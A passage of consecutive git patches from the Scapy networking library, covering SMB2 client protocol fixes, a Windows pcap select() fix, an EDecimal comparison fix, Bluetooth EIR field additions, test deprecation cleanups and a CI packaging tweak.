pkt - or SMB2_Negotiate_Protocol_Response in pkt - ): - if SMB2_Negotiate_Protocol_Response in pkt: - # SMB2 - self.SMB2 = True # We are using SMB2 to talk to the server - self.smb_header = DirectTCP() / SMB2_Header(PID=0xFEFF) if ( SMBNegotiate_Response_Extended_Security in pkt or SMB2_Negotiate_Protocol_Response in pkt @@ -393,13 +390,19 @@ def receive_negotiate_response(self, pkt): ssp_blob = pkt.SecurityBlob # eventually SPNEGO server initiation except AttributeError: ssp_blob = None - if self.SMB2: - self.smb_header.MID += 1 if ( SMB2_Negotiate_Protocol_Response in pkt and pkt.DialectRevision & 0xFF == 0xFF ): # Version is SMB X.??? + # [MS-SMB2] 3.2.5.2 + # If the DialectRevision field in the SMB2 NEGOTIATE Response is + # 0x02FF ... the client MUST allocate sequence number 1 from + # Connection.SequenceWindow, and MUST set MessageId field of the + # SMB2 header to 1. + self.SequenceWindow = (1, 1) + self.smb_header = DirectTCP() / SMB2_Header(PID=0xFEFF, MID=1) + self.SMB2 = True # We're now using SMB2 to talk to the server raise self.SMB2_NEGOTIATE() else: if SMB2_Negotiate_Protocol_Response in pkt: @@ -464,6 +467,11 @@ def update_smbheader(self, pkt): self.smb_header.SessionId = pkt.SessionId self.smb_header.TID = pkt.TID self.smb_header.PID = pkt.PID + # [MS-SMB2] 3.2.5.1.4 + self.SequenceWindow = ( + self.SequenceWindow[0] + max(pkt.CreditCharge, 1), + self.SequenceWindow[1] + pkt.CreditRequest, + ) # DEV: add a condition on NEGOTIATED with prio=0 @@ -481,7 +489,6 @@ def SENT_SETUP_ANDX_REQUEST(self): @ATMT.action(should_send_setup_andx_request) def send_setup_andx_request(self, ssp_tuple): self.session.sspcontext, token, negResult = ssp_tuple - self.smb_header.MID += 1 if self.SMB2 and negResult == GSS_S_CONTINUE_NEEDED: # New session: force 0 self.SessionId = 0 @@ -544,6 +551,8 @@ def receive_setup_andx_response(self, pkt): pkt.sprintf("SMB Session Setup Response: %SMB2_Header.Status%") ), ) + if self.SMB2: + self.update_smbheader(pkt) # Cases depending on the response packet if ( SMBSession_Setup_AndX_Response_Extended_Security in pkt @@ -622,7 +631,6 @@ def incoming_data_received_smb(self, pkt): @ATMT.action(incoming_data_received_smb) def receive_data_smb(self, pkt): - self.update_smbheader(pkt) resp = pkt[SMB2_Header].payload if isinstance(resp, SMB2_Error_Response): if pkt.Status == 0x00000103: # STATUS_PENDING @@ -631,6 +639,7 @@ def receive_data_smb(self, pkt): if pkt.Status == 0x0000010B: # STATUS_NOTIFY_CLEANUP # this is a notify cleanup. ignore return + self.update_smbheader(pkt) # Add the status to the response as metadata resp.NTStatus = pkt.sprintf("%SMB2_Header.Status%") self.oi.smbpipe.send(resp) @@ -641,7 +650,6 @@ def outgoing_data_received_smb(self, fd): @ATMT.action(outgoing_data_received_smb) def send_data(self, d): - self.smb_header.MID += 1 self.send(self.smb_header.copy() / d) @@ -675,6 +683,10 @@ def from_tcpsock(cls, sock, **kwargs): smbsock=SMB_Client.from_tcpsock(sock, **kwargs), ) + @property + def session(self): + return self.ins.atmt.session + def set_TID(self, TID): """ Set the TID (Tree ID). @@ -699,7 +711,7 @@ def tree_connect(self, name): "Path", "\\\\%s\\%s" % ( - self.ins.atmt.session.sspcontext.ServerHostname, + self.session.sspcontext.ServerHostname, name, ), ) @@ -774,8 +786,14 @@ def create_request( FileAttributes.append("FILE_ATTRIBUTE_NORMAL") elif type: raise ValueError("Unknown type: %s" % type) - # SMB 3.11 - if self.ins.atmt.session.Dialect >= 0x0311 and type in ["file", "folder"]: + # [MS-SMB2] 3.2.4.3.8 + RequestedOplockLevel = 0 + if self.session.Dialect >= 0x0300: + RequestedOplockLevel = "SMB2_OPLOCK_LEVEL_LEASE" + elif self.session.Dialect >= 0x0210 and type == "file": + RequestedOplockLevel = "SMB2_OPLOCK_LEVEL_LEASE" + # SMB 3.X + if self.session.Dialect >= 0x0300 and type in ["file", "folder"]: CreateContexts.extend( [ # [SMB2] sect 3.2.4.3.5 @@ -795,7 +813,18 @@ def create_request( ), # [SMB2] sect 3.2.4.3.8 SMB2_Create_Context( - Name=b"RqLs", Data=SMB2_CREATE_REQUEST_LEASE_V2() + Name=b"RqLs", + Data=SMB2_CREATE_REQUEST_LEASE_V2(LeaseKey=RandUUID()._fix()), + ), + ] + ) + elif self.session.Dialect == 0x0210 and type == "file": + CreateContexts.extend( + [ + # [SMB2] sect 3.2.4.3.8 + SMB2_Create_Context( + Name=b"RqLs", + Data=SMB2_CREATE_REQUEST_LEASE(LeaseKey=RandUUID()._fix()), ), ] ) @@ -814,6 +843,7 @@ def create_request( ShareAccess="+".join(ShareAccess), FileAttributes="+".join(FileAttributes), CreateContexts=CreateContexts, + RequestedOplockLevel=RequestedOplockLevel, Name=name, ), verbose=0, @@ -1191,9 +1221,13 @@ def __init__( self.rpcclient = DCERPC_Client.from_smblink(self.sock, ndr64=False, verb=False) # We have a valid smb connection ! print( - "SMB authentication successful using %s%s !" + "%s authentication successful using %s%s !" % ( - repr(self.sock.atmt.session.sspcontext), + SMB_DIALECTS.get( + self.smbsock.session.Dialect, + "SMB %s" % self.smbsock.session.Dialect, + ), + repr(self.smbsock.session.sspcontext), " as GUEST" if self.sock.atmt.IsGuest else "", ) ) diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts index d80fd449426..6279735d8eb 100644 --- a/test/scapy/layers/smbclientserver.uts +++ b/test/scapy/layers/smbclientserver.uts @@ -126,11 +126,11 @@ class run_smbserver: # define client -def run_smbclient(): - return smbclient("localhost", "guest", port=12345, guest=True, cli=False, debug=4) +def run_smbclient(max_dialect=0x0202): + return smbclient("localhost", "guest", port=12345, guest=True, cli=False, debug=4, MAX_DIALECT=max_dialect) -= smbclient: connect then list shares += smbclient: SMB 2.0.2 - connect then list shares with run_smbserver(): try: @@ -142,7 +142,7 @@ with run_smbserver(): finally: cli.close() -= smbclient: connect to test share and list files += smbclient: SMB 2.0.2 - connect to test share and list files with run_smbserver(): try: @@ -154,7 +154,7 @@ with run_smbserver(): finally: cli.close() -= smbclient: connect to test share and get file += smbclient: SMB 2.0.2 - connect to test share and get file LOCALPATH = pathlib.Path(get_temp_dir()) @@ -171,7 +171,7 @@ with run_smbserver(): finally: cli.close() -= smbclient: connect to test share, cd, put file and cat it += smbclient: SMB 2.0.2 - connect to test share, cd, put file and cat it LOCALPATH = pathlib.Path(get_temp_dir()) with (LOCALPATH / "fileC").open("w") as fd: @@ -197,7 +197,7 @@ with run_smbserver(): cli.close() -= smbclient: connect to test share and recursive get += smbclient: SMB 2.0.2 - connect to test share and recursive get LOCALPATH = pathlib.Path(get_temp_dir()) @@ -217,6 +217,26 @@ assert (LOCALPATH / "fileScapy").exists() assert (LOCALPATH / "sub").exists() assert (LOCALPATH / "sub" / "secret").exists() += smbclient: SMB 3.1.1 - connect to test share and recursive get + +LOCALPATH = pathlib.Path(get_temp_dir()) + +with run_smbserver(): + try: + cli = run_smbclient(max_dialect=0x0311) + cli.use("test") + cli.lcd(str(LOCALPATH)) + cli.get(".", r=True) + # check on disk + finally: + cli.close() + +assert (LOCALPATH / "fileA").exists() +assert (LOCALPATH / "fileB").exists() +assert (LOCALPATH / "fileScapy").exists() +assert (LOCALPATH / "sub").exists() +assert (LOCALPATH / "sub" / "secret").exists() + + SMB2 Server tests ~ linux smbserver samba From e4b068bb733f059bef8f77abe2b3377a8d9c6b92 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 4 Aug 2024 20:14:54 +0200 Subject: [PATCH 1340/1632] Fix select() on virtualized I/O on Windows (#4492) --- scapy/arch/libpcap.py | 9 +++++++++ scapy/automaton.py | 1 + 2 files changed, 10 insertions(+) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 21587452413..95d4c4f5119 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -358,6 +358,9 @@ def __init__(self, raise OSError(error) if WINDOWS: + # On Windows, we need to cache whether there are still packets in the + # queue or not. When they aren't, then we select normally like on linux. + self.remaining = True # Winpcap/Npcap exclusive: make every packet to be instantly # returned, and not buffered within Winpcap/Npcap pcap_setmintocopy(self.pcap, 0) @@ -378,7 +381,10 @@ def next(self): byref(self.pkt_data) ) if not c > 0: + self.remaining = False # we emptied the queue return None, None + else: + self.remaining = True ts = ( self.header.contents.ts.tv_sec + float(self.header.contents.ts.tv_usec) / 1e6 @@ -399,6 +405,9 @@ def datalink(self): def fileno(self): # type: () -> int if WINDOWS: + if self.remaining: + # Still packets in the queue. Don't select + return -1 return cast(int, pcap_getevent(self.pcap)) else: # This does not exist under Windows diff --git a/scapy/automaton.py b/scapy/automaton.py index 353a132e14d..8db26da0204 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -113,6 +113,7 @@ def select_objects(inputs, remain): # in very few places but important (e.g. PcapReader), where we have # no valid fileno (and will stop on EOFError). results.add(i) + remain = 0 else: events.append(i.fileno()) if events: From d23dda34a30ef711af753e91291fa07789529e57 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 4 Aug 2024 20:15:12 +0200 Subject: [PATCH 1341/1632] Fix __eq__ in EDecimal (#4491) --- scapy/utils.py | 22 ++++++++-------------- test/regression.uts | 10 ++++++++++ 2 files changed, 18 insertions(+), 14 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 03c0fa55106..c361ca02bbf 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -151,19 +151,10 @@ def __floordiv__(self, other): # type: (_Decimal) -> EDecimal return EDecimal(Decimal.__floordiv__(self, Decimal(other))) - if sys.version_info >= (3,): - def __divmod__(self, other): - # type: (_Decimal) -> Tuple[EDecimal, EDecimal] - r = Decimal.__divmod__(self, Decimal(other)) - return EDecimal(r[0]), EDecimal(r[1]) - else: - def __div__(self, other): - # type: (_Decimal) -> EDecimal - return EDecimal(Decimal.__div__(self, Decimal(other))) - - def __rdiv__(self, other): - # type: (_Decimal) -> EDecimal - return EDecimal(Decimal.__rdiv__(self, Decimal(other))) + def __divmod__(self, other): + # type: (_Decimal) -> Tuple[EDecimal, EDecimal] + r = Decimal.__divmod__(self, Decimal(other)) + return EDecimal(r[0]), EDecimal(r[1]) def __mod__(self, other): # type: (_Decimal) -> EDecimal @@ -179,7 +170,10 @@ def __pow__(self, other, modulo=None): def __eq__(self, other): # type: (Any) -> bool - return super(EDecimal, self).__eq__(other) or float(self) == other + if isinstance(other, Decimal): + return super(EDecimal, self).__eq__(other) + else: + return bool(float(self) == other) def normalize(self, precision): # type: ignore # type: (int) -> EDecimal diff --git a/test/regression.uts b/test/regression.uts index 68f7d30f245..3b2da6739c0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -5156,6 +5156,16 @@ assert pl[0].wirelen == 1 assert pl[0][Ether].src == '00:11:22:33:44:55' assert pl[1][Ether].dst == '00:22:33:44:55:66' += EDecimal + +# GH4488 +p1, p2 = EDecimal('1722417787.778435252'), EDecimal('1722417787.778435216') +assert p1 != p2 +assert p1 > p2 +assert not (p1 < p2) +assert p1 == 1722417787.778435252 # float test +assert p2 == 1722417787.778435216 +assert (p1, 0) > (p2, 1) ############ ############ From aef97fb9034ab4d52043ea5cbf0cfc084dd34d37 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 6 Aug 2024 22:56:22 +0300 Subject: [PATCH 1342/1632] Fix deprecation warnings in dot15d4 and gtp tests (#4493) * tests: fix deprecation warnings in dot15d4 tests Fixes warnings like ``` python3 -Werror -Xdev -m scapy.tools.UTscapy -t test/scapy/layers/dot15d4.uts .. >>> p = LoWPAN_IPHC(tf=0x0, flowlabel=0x8, _nhField=0x3a, _hopLimit=64)/IPv6(dst="aaaa::11:22ff:fe33:4455", src="aaaa::1")/ICMPv6EchoRequest() scapy-2.5.0/scapy/packet.py:443: DeprecationWarning: _nhField has been deprecated in favor of nhField since 2.4.4 ! warnings.warn( scapy-2.5.0/scapy/packet.py:443: DeprecationWarning: _hopLimit has been deprecated in favor of hopLimit since 2.4.4 ! ``` It's a follow-up to f28c11096c6f641ff5b6f98d9f810ee4909efc0d * tests: fix deprecation warnings in gtp tests Fixes warnings like ``` $ python3 -Werror -Xdev -m scapy.tools.UTscapy -P 'load_contrib("gtp")' -t test/contrib/gtp.uts ... >>> assert a[GTPPDUSessionContainer].P == 0 and a[GTPPDUSessionContainer].R == 0 scapy-2.5.0/scapy/packet.py:443: DeprecationWarning: P has been deprecated in favor of PPP since 2.4.5 ! warnings.warn( scapy-2.5.0/scapy/packet.py:443: DeprecationWarning: R has been deprecated in favor of RQI since 2.4.5 ! warnings.warn( ``` It's a follow-up to dcd54d59c94b83632b74e268e8b14026cbcd67c8 --- test/contrib/gtp.uts | 8 ++++---- test/scapy/layers/dot15d4.uts | 38 +++++++++++++++++------------------ 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 569528a9cd7..155c258aef3 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -22,17 +22,17 @@ a = GTPHeader(raw(GTP_U_Header()/GTPPDUSessionContainer(QFI=3))) assert isinstance(a, GTP_U_Header) assert a[GTP_U_Header].E == 1 and a[GTP_U_Header].next_ex == 0x85 assert a[GTPPDUSessionContainer].ExtHdrLen == 1 -assert a[GTPPDUSessionContainer].P == 0 and a[GTPPDUSessionContainer].R == 0 +assert a[GTPPDUSessionContainer].PPP == 0 and a[GTPPDUSessionContainer].RQI == 0 assert a[GTPPDUSessionContainer].QFI == 3 assert a[GTPPDUSessionContainer].NextExtHdr == 0 = GTP_U_Header with PDU Session Container with QFI/PPI -a = GTPHeader(raw(GTP_U_Header()/GTPPDUSessionContainer(type=0, QFI=3, P=1, PPI=6))) +a = GTPHeader(raw(GTP_U_Header()/GTPPDUSessionContainer(type=0, QFI=3, PPP=1, PPI=6))) assert isinstance(a, GTP_U_Header) assert a[GTP_U_Header].E == 1 and a[GTP_U_Header].next_ex == 0x85 assert a[GTPPDUSessionContainer].ExtHdrLen == 2 -assert a[GTPPDUSessionContainer].P == 1 and a[GTPPDUSessionContainer].R == 0 +assert a[GTPPDUSessionContainer].PPP == 1 and a[GTPPDUSessionContainer].RQI == 0 assert a[GTPPDUSessionContainer].QFI == 3 and a[GTPPDUSessionContainer].PPI == 6 assert a[GTPPDUSessionContainer].NextExtHdr == 0 assert a[GTPPDUSessionContainer].type == 0 @@ -55,7 +55,7 @@ assert isinstance(a[GTP_U_Header].payload, PPP) = GTPPDUSessionContainer(), dissect h = 'fa163ed6de7bfa163ed82b9408004500008400000000fe114b560a0a2e010a0a2efe086808680070000034ff006000000001fa163e850200ff800000000045000054074d00004001fb490a0a31fe0a0a32010000325600930001c444ca5f00000000759e0a0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637' gtp = Ether(hex_bytes(h)) -gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].padding == b'\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.49.254' and gtp[GTP_U_Header][IP][ICMP].type == 0 and gtp[GTP_U_Header].type == 0 and gtp[GTP_U_Header].qmp == 0 and gtp[GTP_U_Header].P == 1 and gtp[GTP_U_Header].R == 1 and gtp[GTP_U_Header].QFI == 63 and gtp[GTP_U_Header].PPI == 4 +gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].padding == b'\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.49.254' and gtp[GTP_U_Header][IP][ICMP].type == 0 and gtp[GTP_U_Header].type == 0 and gtp[GTP_U_Header].QMP == 0 and gtp[GTP_U_Header].PPP == 1 and gtp[GTP_U_Header].RQI == 1 and gtp[GTP_U_Header].QFI == 63 and gtp[GTP_U_Header].PPI == 4 = GTPPDUSessionContainer with padding data = b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00^\x00\x01\x00\x00@\x11|\x8c\x7f\x00\x00\x01\x7f\x00\x00\x01\x08h\x08h\x00J\xed^4\xff\x00:\x00\x00\x00\x00\x00\x00\x00\x85\x04\x08\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00\x00&\x00\x01\x00\x00@\x11|\xc4\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x12\x01^ffffffffff000' diff --git a/test/scapy/layers/dot15d4.uts b/test/scapy/layers/dot15d4.uts index c3a782a93db..cff0ca25ddc 100644 --- a/test/scapy/layers/dot15d4.uts +++ b/test/scapy/layers/dot15d4.uts @@ -195,10 +195,10 @@ lowpan_frag_iphc = LoWPAN_IPHC(lowpan_iphc) assert IPv6 in lowpan_frag_iphc assert lowpan_frag_iphc.load == b' Date: Fri, 9 Aug 2024 22:54:42 +0200 Subject: [PATCH 1343/1632] Fix pip install zipapp --- .config/ci/zipapp.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh index 2459de212be..e7f28e3f421 100755 --- a/.config/ci/zipapp.sh +++ b/.config/ci/zipapp.sh @@ -56,6 +56,8 @@ echo "> Stripping down..." cd "$SCPY" && find . -not \( \ -wholename "./scapy*" -o \ -wholename "./pyproject.toml" -o \ + -wholename "./setup.py" -o \ + -wholename "./README.md" -o \ -wholename "./LICENSE" \ \) -delete cd $DIR From 86f034b61f9f2d44225d8437ddd36472c7cf6257 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 12 Aug 2024 14:03:48 +0200 Subject: [PATCH 1344/1632] bluetooth: Add some EIR fields (#4273) --- scapy/fields.py | 5 +- scapy/layers/bluetooth.py | 111 ++++++++++++++++++++++++++++++++ test/scapy/layers/bluetooth.uts | 26 ++++++++ 3 files changed, 140 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 3e459bf5615..94d79d7dfd6 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3183,7 +3183,8 @@ def __init__(self, name, # type: str default, # type: Optional[Union[int, FlagValue]] size, # type: int - names # type: Union[List[str], str, Dict[int, str]] + names, # type: Union[List[str], str, Dict[int, str]] + **kwargs # type: Any ): # type: (...) -> None # Convert the dict to a list @@ -3194,7 +3195,7 @@ def __init__(self, names = tmp # Store the names as str or list self.names = names - super(FlagsField, self).__init__(name, default, size) + super(FlagsField, self).__init__(name, default, size, **kwargs) def _fixup_val(self, x): # type: (Any) -> Optional[FlagValue] diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 3bd557989fb..0243e6fe8c6 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -53,7 +53,9 @@ XLELongField, XStrLenField, XLEShortField, + XLEIntField, LEMACField, + BitEnumField, ) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv @@ -1038,6 +1040,19 @@ class EIR_IncompleteList16BitServiceUUIDs(EIR_CompleteList16BitServiceUUIDs): name = "Incomplete list of 16-bit service UUIDs" +class EIR_CompleteList32BitServiceUUIDs(EIR_Element): + name = 'Complete list of 32-bit service UUIDs' + fields_desc = [ + # https://www.bluetooth.com/specifications/assigned-numbers + FieldListField('svc_uuids', None, XLEIntField('uuid', 0), + length_from=EIR_Element.length_from) + ] + + +class EIR_IncompleteList32BitServiceUUIDs(EIR_CompleteList32BitServiceUUIDs): + name = 'Incomplete list of 32-bit service UUIDs' + + class EIR_CompleteList128BitServiceUUIDs(EIR_Element): name = "Complete list of 128-bit service UUIDs" fields_desc = [ @@ -1067,6 +1082,69 @@ class EIR_TX_Power_Level(EIR_Element): fields_desc = [SignedByteField("level", 0)] +class EIR_ClassOfDevice(EIR_Element): + name = 'Class of device' + fields_desc = [ + FlagsField('major_service_classes', 0, 11, [ + 'limited_discoverable_mode', + 'le_audio', + 'reserved', + 'positioning', + 'networking', + 'rendering', + 'capturing', + 'object_transfer', + 'audio', + 'telephony', + 'information' + ], tot_size=-3), + BitEnumField('major_device_class', 0, 5, { + 0x00: 'miscellaneous', + 0x01: 'computer', + 0x02: 'phone', + 0x03: 'lan', + 0x04: 'audio_video', + 0x05: 'peripheral', + 0x06: 'imaging', + 0x07: 'wearable', + 0x08: 'toy', + 0x09: 'health', + 0x1f: 'uncategorized' + }), + BitField('minor_device_class', 0, 6), + BitField('fixed', 0, 2, end_tot_size=-3) + ] + + +class EIR_SecureSimplePairingHashC192(EIR_Element): + name = 'Secure Simple Pairing Hash C-192' + fields_desc = [NBytesField('hash', 0, 16)] + + +class EIR_SecureSimplePairingRandomizerR192(EIR_Element): + name = 'Secure Simple Pairing Randomizer R-192' + fields_desc = [NBytesField('randomizer', 0, 16)] + + +class EIR_SecurityManagerOOBFlags(EIR_Element): + name = 'Security Manager Out of Band Flags' + fields_desc = [ + BitField('oob_flags_field', 0, 1), + BitField('le_supported', 0, 1), + BitField('previously_used', 0, 1), + BitField('address_type', 0, 1), + BitField('reserved', 0, 4) + ] + + +class EIR_PeripheralConnectionIntervalRange(EIR_Element): + name = 'Peripheral Connection Interval Range' + fields_desc = [ + LEShortField('conn_interval_min', 0xFFFF), + LEShortField('conn_interval_max', 0xFFFF) + ] + + class EIR_Manufacturer_Specific_Data(EIR_Element): name = "EIR Manufacturer Specific Data" fields_desc = [ @@ -1154,6 +1232,30 @@ def extract_padding(self, s): return s[:plen], s[plen:] +class EIR_ServiceData32BitUUID(EIR_Element): + name = 'EIR Service Data - 32-bit UUID' + fields_desc = [ + XLEIntField('svc_uuid', 0), + ] + + def extract_padding(self, s): + # Needed to end each EIR_Element packet and make PacketListField work. + plen = EIR_Element.length_from(self) - 4 + return s[:plen], s[plen:] + + +class EIR_ServiceData128BitUUID(EIR_Element): + name = 'EIR Service Data - 128-bit UUID' + fields_desc = [ + UUIDField('svc_uuid', None, uuid_fmt=UUIDField.FORMAT_REV) + ] + + def extract_padding(self, s): + # Needed to end each EIR_Element packet and make PacketListField work. + plen = EIR_Element.length_from(self) - 16 + return s[:plen], s[plen:] + + class HCI_Command_Hdr(Packet): name = "HCI Command header" fields_desc = [XBitField("ogf", 0, 6, tot_size=-2), @@ -2231,13 +2333,22 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_Flags, type=0x01) bind_layers(EIR_Hdr, EIR_IncompleteList16BitServiceUUIDs, type=0x02) bind_layers(EIR_Hdr, EIR_CompleteList16BitServiceUUIDs, type=0x03) +bind_layers(EIR_Hdr, EIR_IncompleteList32BitServiceUUIDs, type=0x04) +bind_layers(EIR_Hdr, EIR_CompleteList32BitServiceUUIDs, type=0x05) bind_layers(EIR_Hdr, EIR_IncompleteList128BitServiceUUIDs, type=0x06) bind_layers(EIR_Hdr, EIR_CompleteList128BitServiceUUIDs, type=0x07) bind_layers(EIR_Hdr, EIR_ShortenedLocalName, type=0x08) bind_layers(EIR_Hdr, EIR_CompleteLocalName, type=0x09) bind_layers(EIR_Hdr, EIR_Device_ID, type=0x10) bind_layers(EIR_Hdr, EIR_TX_Power_Level, type=0x0a) +bind_layers(EIR_Hdr, EIR_ClassOfDevice, type=0x0d) +bind_layers(EIR_Hdr, EIR_SecureSimplePairingHashC192, type=0x0e) +bind_layers(EIR_Hdr, EIR_SecureSimplePairingRandomizerR192, type=0x0f) +bind_layers(EIR_Hdr, EIR_SecurityManagerOOBFlags, type=0x11) +bind_layers(EIR_Hdr, EIR_PeripheralConnectionIntervalRange, type=0x12) bind_layers(EIR_Hdr, EIR_ServiceData16BitUUID, type=0x16) +bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) +bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) bind_layers(EIR_Hdr, EIR_Manufacturer_Specific_Data, type=0xff) bind_layers(EIR_Hdr, EIR_Raw) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 861ffd4af20..fbd16a3d4dd 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -415,6 +415,32 @@ assert evt_pkt[HCI_LE_Meta_Connection_Update_Complete].timeout == 60 + Bluetooth LE Advertising / Scan Response Data Parsing += Parse EIR_IncompleteList32BitServiceUUIDs + +p = HCI_Hdr(hex_bytes('042fff019cc888f640c401000c025af32cb09904f6dc73222396f640c40c025a40dbca09000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) +assert EIR_IncompleteList32BitServiceUUIDs in p +assert len(p[EIR_IncompleteList32BitServiceUUIDs].svc_uuids) == 38 + += Parse EIR_CompleteList32BitServiceUUIDs + +p = HCI_Hdr(hex_bytes('042fff0106ec883aef1801003c04285758b30e0954562064656c2073616cc3b36e09030a110c110e1100120105810700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) +assert EIR_CompleteList32BitServiceUUIDs in p +assert p[EIR_CompleteList32BitServiceUUIDs].svc_uuids == [] + += Parse EIR_ClassOfDevice + +p = HCI_Hdr(hex_bytes('043e2b020100000a1bb44ce0001f02010503ff000106084d4920524303021218040d040500020a0004fe06ec88a2')) +assert EIR_ClassOfDevice in p +assert p[EIR_ClassOfDevice].major_service_classes == 0 +assert p[EIR_ClassOfDevice].major_device_class == 5 +assert p[EIR_ClassOfDevice].minor_device_class == 1 + += Parse EIR_ServiceData32BitUUID + +p = HCI_Hdr(hex_bytes('042fff01c47c80894df801000c0128a269a30c4a125d13f30196894df80c012820f61a1a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) +assert EIR_ServiceData32BitUUID in p +assert p[EIR_ServiceData32BitUUID].svc_uuid == 0x001a1af6 + = Parse EIR_Flags, EIR_CompleteList16BitServiceUUIDs, EIR_CompleteLocalName and EIR_TX_Power_Level ad_report_raw_data = \ From 363a726a761c2f7fc505f589909805b77ee95245 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 18 Aug 2024 09:41:28 +0300 Subject: [PATCH 1345/1632] tests: catch expected DNS deprecation warnings (#4500) to make it possible to run the tests with `-Werror`. Fixes ```sh >>> assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' Traceback (most recent call last): File "", line 2, in File "scapy/layers/dns.py", line 1256, in __getattr__ warnings.warn( DeprecationWarning: The DNS fields 'qd', 'an', 'ns' and 'ar' are now PacketListField(s) ! ``` It's a follow-up to dda902e829a51cc6237e253290c6871f30d7daf3 --- test/scapy/layers/dns.uts | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 3abe180e34d..88d7652768c 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -481,10 +481,17 @@ conf.max_list_count = old_max_list_count # Get through a list (should be pkt.an[0].rdata) c = b'\x01\x00^\x00\x00\xfb\x14\x0cv\x8f\xfe(\x08\x00E\x00\x01C\xe3\x91@\x00\xff\x11\xf4u\xc0\xa8\x00\xfe\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01/L \x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x80\x01\x00\x00\x11\x94\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00x\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' pkt = Ether(c) -assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' +with warnings.catch_warnings(record=True) as w: + warnings.simplefilter("always") + assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' + assert len(w) == 1 and issubclass(w[-1].category, DeprecationWarning) # Set qd to None (should be qd=[]) -pkt = DNS(qr=1, qd=None, aa=1, rd=1) +with warnings.catch_warnings(record=True) as w: + warnings.simplefilter("always") + pkt = DNS(qr=1, qd=None, aa=1, rd=1) + assert len(w) == 1 and issubclass(w[-1].category, DeprecationWarning) + pkt = DNS(bytes(pkt)) assert pkt.qd == [] From 3b95e8076413b83e2e5809df3e4f514a3b95003e Mon Sep 17 00:00:00 2001 From: Michael <99675385+Hitalot@users.noreply.github.com> Date: Wed, 21 Aug 2024 13:31:00 +0200 Subject: [PATCH 1346/1632] Fixed wrong IKEv2 gw_id_type in IKEv2_Notify for Redirect Payloads (#4496) --- scapy/contrib/ikev2.py | 2 +- 1 file changed, 1 insertion(+), 1 